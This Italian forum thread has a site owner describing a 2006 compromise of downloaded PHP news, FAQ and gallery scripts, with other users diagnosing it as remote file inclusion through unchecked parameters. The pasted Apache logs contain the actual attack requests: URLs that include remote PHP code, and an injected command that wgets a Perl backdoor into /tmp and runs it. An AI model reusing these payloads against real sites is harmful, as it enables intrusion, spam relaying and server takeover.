Problemi di attacco al sito

[sustia]

Innanzitutto non sono sicuro che sia la sezione giusta, ma quella di Apache non la vedo piú, quindi prego eventualmente al moderatore di spostarmi dove ritiene piú opportuno.

Ieri mi ha scritto il responsabile del server dove abbiam il sito dell'azienda riferendomi di due attacchi e della conseguente disattivazione del sito:

il primo ha lanciato uno script per l'invio massivo di email
pubblicitari ad utenti brasiliani (puoi consultare i log del sito
Noria per maggiori dettagli) - ne sono stati inviati con successo
circa 60000 prima d'esser riuscito a bloccare il tutto -:

200.193.225.67 - - [12/Mar/2006:08:00:44 +0100] "GET
/sito/news/index.php?config=1&base_datapath=http://dcorp.newinvest.com.br/list.txt?&chdir=/raid0/web/cnr/guest/noria/ HTTP/1.1" 200
55948
200.193.225.67 - - [12/Mar/2006:08:00:48 +0100] "GET
/sito/news/index.php?config=1&base_datapath=http://dcorp.newinvest.com.br/list.txt?&chdir=/raid0/web/cnr/guest/noria/ HTTP/1.1" 200
23054
200.193.225.67 - - [12/Mar/2006:08:01:08 +0100] "POST
/sito/news/index.php?config=1&base_datapath=http://dcorp.newinvest.com.br/list.txt?&action=upload&chdir=/raid0/web/cnr/guest/noria/ HTTP/1.1" 200

Il secondo ha installato un programma per ottenere accesso interattivo
al server di Area; questo probabilmente finalizzato ad ottenere accesso
privilegiato.

129.22.63.191 - - [12/Mar/2006:13:47:56 +0100] "GET
/sito/news/index.php?config=http://www.agatsuma.kit.net/blabla/vsf.vsf?&cmd=cd%20/tmp;%20wget%20http://www.yasam.ru/VidaLoka/backtool.txt;%20perl%20backtool.txt HTTP/1.1" 200
13778

La cartella news contiene uno script che io uso per inserire le news, ma anche altre pagine index.php in altre cartelle (faq, gallery) sono state attaccate allo stesso modo.
Ora, quello che vorrei sapere io è questo: è un problema nella configurazione del server oppure mio?
Mi sembra strano che 4-5 script differenti siano tutti suscettibili allo stesso attacco...oltretutto aveva attivato delle restrizioni sul server stesso (il safe_mode) per evitare questo, che mi creavano non pochi problemi.

[thomas_anderson]

http://sysadminforum.com/t119309.html

Qui si usa una tecnica simile, cioè l'invocazione di una shell e il relativo inserimento dei comandi cd e wget. Usi anche tu Linux sul server? potrebbe trattarsi di un problema di configurazione del web server. ciao

[sustia]

Originariamente inviato da thomas_anderson
http://sysadminforum.com/t119309.html

Qui si usa una tecnica simile, cioè l'invocazione di una shell e il relativo inserimento dei comandi cd e wget. Usi anche tu Linux sul server? potrebbe trattarsi di un problema di configurazione del web server. ciao

Grazie per la risposta.
Si, usano Linux (quelli del server ovviamente), e per questo chiedevo se è un errore mio o del webserver, perchè mi meraviglia che tutti gli script siano attaccati e che soffrano tutti della stessa vulnerabilità.
Ora do' un'occhiata al link.

[Habanero]

non vorrei sbagliare ma secondo me a occhio è una vulnerabilità della pagina php...

che script sono? li avete fatti voi?
Ancora per ipotesi... mi sembra che il parametro "base_datapath" permetta di puntare fuori dal sito... cosa assolutamente non bella...

[albgen]

Originariamente inviato da Habanero
non vorrei sbagliare ma secondo me a occhio è una vulnerabilità della pagina php...

che script sono? li avete fatti voi?
Ancora per ipotesi... mi sembra che il parametro "base_datapath" permetta di puntare fuori dal sito... cosa assolutamente non bella...

quoto

[sustia]

Originariamente inviato da Habanero
non vorrei sbagliare ma secondo me a occhio è una vulnerabilità della pagina php...

che script sono? li avete fatti voi?
Ancora per ipotesi... mi sembra che il parametro "base_datapath" permetta di puntare fuori dal sito... cosa assolutamente non bella...

Sono script per la gestione delle news, delle faq, gallerie di immagini..non li ho fatti io, ho solo trovato gli script in rete e utilizzati, per quello chiedevo.
Quindi è stato più che altro un problema di script che di server se ho capito bene.

[Habanero]

le mie sono ovviamente supposizioni ma penso siano plausibili...

Un richiesta GET per un indirizzo del genere:
/sito/news/index.php?config=1&base_datapath=http://dcorp.newinvest.com.br/list.txt?&chdir=/raid0/web/cnr/guest/noria/


richiama la tua pagina /sito/news/index.php e le passa i parametri config e base_datapath. Quest'ultimo probabilmente dovrebbe contenere l'indirizzo di un'altra cartella o pagina... evidentemente accetta un indirizzo web completo cosa è stata usata per richiamare codice php nocivo da un sito esterno. Vedi http://dcorp.newinvest.com.br/list...
Se digiti quell'indirizzo infatti ritorna puro codice php. Probabilmente la tua pagina index.php processa quel codice provocandone l'esecuzione locale. La soluzione sarebbe un check più stringente sui parametri passati... cosa sempre indispensabile per assicurare una buona sicurezza delle applicazioni web.

[sustia]

Originariamente inviato da Habanero
le mie sono ovviamente supposizioni ma penso siano plausibili...

Un richiesta GET per un indirizzo del genere:
/sito/news/index.php?config=1&base_datapath=http://dcorp.newinvest.com.br/list.txt?&chdir=/raid0/web/cnr/guest/noria/


richiama la tua pagina /sito/news/index.php e le passa i parametri config e base_datapath. Quest'ultimo probabilmente dovrebbe contenere l'indirizzo di un'altra cartella o pagina... evidentemente accetta un indirizzo web completo cosa è stata usata per richiamare codice php nocivo da un sito esterno. Vedi http://dcorp.newinvest.com.br/list...
Se digiti quell'indirizzo infatti ritorna puro codice php. Probabilmente la tua pagina index.php processa quel codice provocandone l'esecuzione locale. La soluzione sarebbe un check più stringente sui parametri passati... cosa sempre indispensabile per assicurare una buona sicurezza delle applicazioni web.

Si, è possibile che qualche script non fosse aggiornato magari..
Comunque abbiamo tolto le dir interessate e sto provvedendo a rifare il tutto con un CMS, sperando non succeda ancora un qualche casino.